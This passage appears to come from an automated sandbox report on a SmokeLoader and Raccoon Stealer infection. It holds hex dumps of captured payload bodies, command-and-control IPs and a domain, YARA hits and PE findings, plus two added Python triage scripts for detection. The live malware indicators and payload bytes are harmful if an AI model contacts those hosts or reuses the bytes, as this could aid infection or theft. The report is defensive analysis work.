16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc 
ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 13:32:24 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc 
ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
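The responses above fall into three shapes that are easy to tell apart once the body is decoded: a plain Apache or nginx 404 page, a "404 Not Found" that claims `text/html` but whose chunked body is high-entropy binary (chunk sizes `7cc02` and `1f42` in the captures), and a `200 OK` `application/octet-stream` whose body starts with a ZIP local file header naming `nssdbm3.dll`. The following triage script is an added example and not part of the sandbox report: it splits status line, headers and body (Content-Length or chunked), classifies the body, and flags a declared Content-Type that does not match it. The sample responses are constructed from the first bytes of the captures above and are shortened, so their lengths do not equal the captured Content-Length values.

```python
"""Triage of HTTP responses like the captures above: split status line, headers
and body (Content-Length or chunked), then compare the declared Content-Type with
what the body actually contains. Added example, not part of the sandbox report;
the sample responses are constructed from the first bytes of the captures."""
import math
import struct
from collections import Counter

ZIP_LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")  # ZIP local file header, 30 bytes


def dechunk(data: bytes) -> bytes:
    """Decode a chunked transfer-encoded body; tolerate a truncated capture."""
    out = bytearray()
    while True:
        size_line, _, data = data.partition(b"\r\n")
        if not size_line:
            return bytes(out)                       # truncated capture
        size = int(size_line.split(b";")[0], 16)    # ignore chunk extensions
        if size == 0:
            return bytes(out)
        out += data[:size]
        data = data[size + 2:]                      # skip chunk data and its CRLF


def parse_response(raw: bytes):
    """Return (status_code, headers, body) with the body already de-chunked."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    if headers.get("transfer-encoding", "").lower() == "chunked":
        return status, headers, dechunk(rest)
    return status, headers, rest[: int(headers.get("content-length", len(rest)))]


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (HTML sits around 4-5, ciphertext near 8)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def zip_first_entry(body: bytes):
    """Parse the first local file header of a ZIP body (None if not a ZIP)."""
    if body[:4] != b"PK\x03\x04" or len(body) < ZIP_LOCAL_HDR.size:
        return None
    _sig, _ver, _flags, method, _t, _d, crc, csize, usize, nlen, _xlen = \
        ZIP_LOCAL_HDR.unpack_from(body)
    name = body[ZIP_LOCAL_HDR.size:ZIP_LOCAL_HDR.size + nlen].decode("ascii", "replace")
    return {"name": name, "method": method, "compressed": csize,
            "uncompressed": usize, "crc32": crc}


def classify_body(body: bytes) -> str:
    """'zip', 'html' (markup that is almost entirely printable) or 'binary'."""
    if body[:4] == b"PK\x03\x04":
        return "zip"
    printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in body)
    if body.lstrip().startswith(b"<") and printable >= 0.95 * len(body):
        return "html"
    return "binary"


def triage(raw: bytes) -> dict:
    """Flag a response whose Content-Type says text/html but whose body is not."""
    status, headers, body = parse_response(raw)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    kind = classify_body(body)
    result = {"status": status, "content_type": ctype, "body_kind": kind,
              "entropy": round(entropy(body), 2),
              "mismatch": ctype == "text/html" and kind != "html"}
    if kind == "zip":
        result["zip_entry"] = zip_first_entry(body)
    return result


# Constructed samples. Bodies are shortened: the 404 page keeps its text, the
# binary "404" keeps only the first 16 captured bytes in a small chunk, and the
# 200 OK keeps the captured ZIP local file header plus a few data bytes.
HTML_404_BODY = (b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\r\n<html><head>\r\n'
                 b'<title>404 Not Found</title>\r\n</head><body>\r\n<h1>Not Found</h1>\r\n'
                 b'<p>The requested URL / was not found on this server.</p>\r\n'
                 b'<hr></body></html>')
APACHE_404 = (b"HTTP/1.1 404 Not Found\r\nServer: Apache/2.4.29 (Ubuntu)\r\n"
              b"Content-Type: text/html; charset=utf-8\r\nContent-Length: "
              + str(len(HTML_404_BODY)).encode() + b"\r\n\r\n" + HTML_404_BODY)
BIN_CHUNK = bytes.fromhex("0000b460fbd40e1a4010163080b72c78")
NGINX_404 = (b"HTTP/1.1 404 Not Found\r\nServer: nginx/1.20.1\r\n"
             b"Content-Type: text/html; charset=utf-8\r\nTransfer-Encoding: chunked\r\n\r\n"
             b"10\r\n" + BIN_CHUNK + b"\r\n0\r\n\r\n")
ZIP_HEAD = (bytes.fromhex("504b030414000000" "0800" "9a7a6e4e" "3c09f87b" "72d20000"
                          "d0690100" "0b00" "0000") + b"nssdbm3.dll" + bytes.fromhex("ecfd7f7c"))
OCTET_200 = (b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: application/octet-stream\r\n"
             b"Content-Length: " + str(len(ZIP_HEAD)).encode() + b"\r\n\r\n" + ZIP_HEAD)

if __name__ == "__main__":
    for sample in (APACHE_404, NGINX_404, OCTET_200):
        print(triage(sample))
```

The check keys on the Content-Type/body mismatch rather than on the 404 status, since a real 404 page is exactly what the Apache responses with Content-Length 402 are. Two caveats: a server that applies `Content-Encoding: gzip` to its HTML would also read as binary, so inflate (or at least check that header) before classifying; and the ZIP parse only reads the first local file header, which is enough to name the first entry (`nssdbm3.dll`, deflate, 53874 bytes compressed) but says nothing about the rest of the archive.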
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bkhtxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: hajezey1.top
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.7:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.7:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49850 version: TLS 1.2
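The long run of "TCP traffic detected without corresponding DNS query" entries above is the output of a simple correlation: every outbound connection is checked against the set of addresses that DNS answers have named so far, and a destination that no answer covered is reported once per connection. The script below is an added example of that check and is not the sandbox's own code. The event list is constructed: the two unresolved addresses are the ones in the report, while the names, the other addresses (documentation ranges) and all timestamps are made up.

```python
"""Correlate outbound connections with the DNS answers seen before them, the
check behind the "TCP traffic detected without corresponding DNS query" lines
above. Added example, not the sandbox's own logic. The events are constructed:
the two unresolved IPs are the ones in the report, everything else is made up."""
from collections import Counter
from ipaddress import ip_address, ip_network

# RFC 1918 plus loopback. Deliberately not ipaddress.is_private, which also
# matches the documentation ranges used for the constructed hosts below.
LOCAL_NETS = [ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# ("dns", ts, qname, answered_ip)  or  ("conn", ts, dst_ip, dst_port)
EVENTS = [
    ("dns",  1.0, "updates.example", "203.0.113.10"),   # constructed name and IP
    ("conn", 1.2, "203.0.113.10", 443),                 # covered by the answer above
    ("conn", 1.5, "216.128.137.31", 80),                # IP from the report, never resolved
    ("conn", 1.6, "216.128.137.31", 80),
    ("conn", 2.0, "194.180.174.181", 80),               # IP from the report, never resolved
    ("conn", 2.2, "198.51.100.7", 80),                  # constructed: used before its answer
    ("dns",  2.5, "late.example", "198.51.100.7"),
    ("conn", 2.6, "198.51.100.7", 80),                  # now covered
    ("conn", 3.0, "192.168.2.1", 53),                   # constructed local host, skipped
]


def is_local(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def find_unresolved(events, ignore_local=True):
    """Return (ts, ip, port) for each connection to an address that no DNS
    answer had named by the time the connection was made."""
    answered = {}                       # ip -> set of names resolved to it so far
    findings = []
    for ev in sorted(events, key=lambda e: e[1]):
        if ev[0] == "dns":
            answered.setdefault(ev[3], set()).add(ev[2])
        elif ev[0] == "conn":
            _, ts, ip, port = ev
            if ignore_local and is_local(ip):
                continue
            if ip not in answered:
                findings.append((ts, ip, port))
    return findings


def summarize(findings) -> dict:
    """Collapse the per-connection list into {ip: connection_count}; the report
    above prints the same information as one line per connection."""
    return dict(Counter(ip for _, ip, _ in findings))


if __name__ == "__main__":
    for ip, n in summarize(find_unresolved(EVENTS)).items():
        print(f"{ip}: {n} connection(s) without a preceding DNS answer")
```

Order matters: a connection made before the answer that names its destination is still reported (the `198.51.100.7` case), which is the behaviour you want for malware that carries a hard-coded address list and only resolves names later. The check produces false positives when resolution happened outside the capture (OS cache, a resolver the sensor cannot see such as DNS over HTTPS), and it proves only that the address appeared in some answer, not that the answer belonged to the process that connected, so treat a clean result as weak evidence.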

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match File source: 26.1.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.SkB6zJ6H3N.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.97A5.exe.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.1.97A5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.cviueca.2c715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.192F.exe.3180e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.192F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.97A5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.cviueca.2d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SkB6zJ6H3N.exe.2be15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.SkB6zJ6H3N.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.1.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.192F.exe.3190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000002.450724070.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.368853755.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.404074560.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.294055792.0000000003111000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.368895221.00000000004E1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.308080762.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.419226513.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.449678502.0000000002C10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.402440778.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.404878363.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.307863142.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.419361924.00000000031B1000.00000004.00020000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: SkB6zJ6H3N.exe, 00000000.00000002.253287866.0000000002DFA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.442845982.00000000048A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 32BC.exe PID: 5540, type: MEMORYSTR

System Summary:

.NET source code contains very large array initializations
Source: 8746.exe.7.dr, ue60aue64bue63aue60cue62cue60aue610ue60fue63aue63due63aue60bue61cue63cue623.cs Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
Source: EDD.exe.7.dr, ???????????????.cs Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E32A9 29_2_6A9E32A9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DE2C5 29_2_6A9DE2C5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4AEF 29_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFA2B 29_2_6A9CFA2B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9BEB8A 29_2_6A9BEB8A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94EBB0 29_2_6A94EBB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94ABD8 29_2_6A94ABD8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A968BE8 29_2_6A968BE8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C23E3 29_2_6A9C23E3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A309 29_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93AB40 29_2_6A93AB40
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A933360 29_2_6A933360
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92B090 29_2_6A92B090
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916800 29_2_6A916800
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1002 29_2_6A9D1002
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A830 29_2_6A93A830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A948840 29_2_6A948840
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A932990 29_2_6A932990
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E2EF7 29_2_6A9E2EF7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A936E30 29_2_6A936E30
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99AE60 29_2_6A99AE60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D67E2 29_2_6A9D67E2
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91EC9B 29_2_6A91EC9B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A932430 29_2_6A932430
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9435D0 29_2_6A9435D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A910D20 29_2_6A910D20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A932D50 29_2_6A932D50
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E1D55 29_2_6A9E1D55
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_004368C0 33_2_004368C0
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_0041EDBE 33_2_0041EDBE
PE file contains strange resources
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 192F.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 75B0.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sfiueca.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.27.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.27.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
